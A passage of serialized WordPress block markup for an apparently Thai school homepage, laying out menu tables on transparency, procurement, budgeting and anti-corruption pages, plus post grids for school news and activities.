{\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":758,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-2.png\" alt=\"\" class=\"wp-image-758\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=780\" data-type=\"page\" data-id=\"780\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=824\">แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\" data-type=\"page\" data-id=\"784\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=771\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=776\" data-type=\"page\" data-id=\"776\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=716\" data-type=\"page\" data-id=\"716\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การสร้างวัฒนธรรม  No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=831\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_74522c-22\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_df8487-4e\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_df8487-4e\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8c5230-93\",\"tabCount\":2,\"currentTab\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8c5230-93 kt-tabs-has-2-tabs kt-active-tab-2 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_c20813-1f\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_c20813-1f\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure 